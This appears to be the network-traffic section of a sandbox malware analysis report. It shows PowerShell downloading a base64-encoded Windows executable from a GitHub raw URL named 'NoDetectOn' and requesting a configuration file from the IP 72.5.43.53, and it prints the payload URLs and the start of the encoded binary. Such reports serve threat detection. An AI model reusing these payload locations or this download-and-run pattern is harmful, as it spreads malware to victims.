                          Oct 2, 2024 05:26:51.113226891 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.113291979 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.113296986 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.113343954 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.113643885 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.113661051 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.113714933 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.113720894 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.113765001 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114164114 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114187002 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114233971 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114238977 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114278078 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114526033 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114542961 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114588976 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114593983 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114633083 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114897013 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114913940 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.114964962 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.114972115 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.115011930 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.117311954 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.117332935 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.117379904 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.117384911 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.117424011 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199407101 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199436903 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199500084 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199532986 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199549913 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199568033 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199592113 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199610949 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199645996 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199651003 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.199673891 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.199692011 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200123072 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200144053 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200196028 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200200081 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200239897 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200247049 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200350046 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200371027 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200403929 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200407982 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.200432062 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200450897 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.200999022 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201016903 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201086998 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.201092005 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201138020 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.201378107 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201394081 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201447964 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.201452017 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.201491117 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.201992035 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202011108 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202071905 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.202076912 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202116966 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.202487946 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202507973 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202584028 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.202589989 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.202646971 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.205327988 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.286104918 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286132097 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286276102 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.286288023 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286329031 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.286479950 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286498070 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286556959 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.286562920 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286614895 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.286952972 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.286969900 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287024021 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287029982 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287070036 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287338972 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287360907 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287400961 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287405014 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287434101 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287450075 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287687063 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287703991 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287756920 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.287761927 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.287807941 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288054943 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288069963 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288114071 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288119078 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288160086 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288522005 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288537979 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288585901 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288592100 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288630962 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288862944 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288878918 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288914919 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288919926 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.288942099 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.288959980 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.372999907 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373024940 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373155117 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.373191118 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373241901 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.373454094 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373471022 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373547077 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.373553038 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373599052 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.373773098 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373786926 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373851061 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.373857021 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.373903990 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.374205112 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374219894 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374274969 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.374279022 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374319077 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.374598980 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374612093 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374677896 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.374684095 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.374722004 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375051975 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375066996 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375121117 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375127077 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375160933 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375505924 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375520945 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375571966 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375579119 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375614882 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375845909 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375859976 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375916004 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.375921011 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.375958920 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.460062981 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460091114 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460268021 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.460297108 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460345030 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.460371017 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460386038 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460439920 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.460444927 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460485935 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.460921049 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.460942984 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461014986 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.461019993 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461070061 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.461246967 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461261034 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461321115 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.461325884 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461364985 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.461728096 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461743116 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461800098 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.461805105 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.461848021 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462054968 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462069988 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462121010 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462125063 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462172031 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462605000 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462621927 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462665081 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462671041 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462694883 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462713957 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.462929010 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462944031 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.462996006 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.463001013 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.463038921 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.547283888 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.547343016 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.547410011 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.547436953 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.547450066 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.547616959 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.547631979 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.547696114 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.547703028 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548120975 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548136950 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548196077 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.548202991 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548434019 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548446894 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548500061 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.548506975 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548881054 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548893929 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548955917 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.548965931 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549088001 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549122095 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549149036 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.549160957 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549170971 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.549173117 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549223900 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.551948071 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.849739075 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.854695082 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:26:51.854779005 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.854862928 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.859666109 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.210968018 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.211114883 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.219258070 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.219727993 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.223968029 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.224503040 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.224579096 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.224723101 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.229475975 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:34.587415934 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:34.587485075 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:34.587558031 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:34.592309952 CEST804973872.5.43.53192.168.2.4

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 2, 2024 05:26:48.851131916 CEST5029053192.168.2.41.1.1.1
                          Oct 2, 2024 05:26:48.857975006 CEST53502901.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 2, 2024 05:26:48.851131916 CEST192.168.2.41.1.1.10x20acStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 2, 2024 05:26:48.857975006 CEST1.1.1.1192.168.2.40x20acNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                          Oct 2, 2024 05:26:48.857975006 CEST1.1.1.1192.168.2.40x20acNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                          Oct 2, 2024 05:26:48.857975006 CEST1.1.1.1192.168.2.40x20acNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                          Oct 2, 2024 05:26:48.857975006 CEST1.1.1.1192.168.2.40x20acNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • raw.githubusercontent.com
                          • 72.5.43.53

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973172.5.43.53807628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 05:26:51.854862928 CEST73OUTGET /450/RRCFG.txt HTTP/1.1
                          Host: 72.5.43.53
                          Connection: Keep-Alive


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44973872.5.43.53807628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Oct 2, 2024 05:27:13.224723101 CEST73OUTGET /450/RRCFG.txt HTTP/1.1
                          Host: 72.5.43.53
                          Connection: Keep-Alive


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730185.199.111.1334437628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          2024-10-02 03:26:49 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                          Host: raw.githubusercontent.com
                          Connection: Keep-Alive
                          2024-10-02 03:26:49 UTC905INHTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 2935468
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                          Accept-Ranges: bytes
                          Date: Wed, 02 Oct 2024 03:26:49 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740032-EWR
                          X-Cache: HIT
                          X-Cache-Hits: 0
                          X-Timer: S1727839609.408920,VS0,VE1
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: b84f01b968481bf29acaa8ad634c40305913df62
                          Expires: Wed, 02 Oct 2024 03:31:49 GMT
                          Source-Age: 282
                          2024-10-02 03:26:49 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                          2024-10-02 03:26:49 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                          Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                          2024-10-02 03:26:49 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                          Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
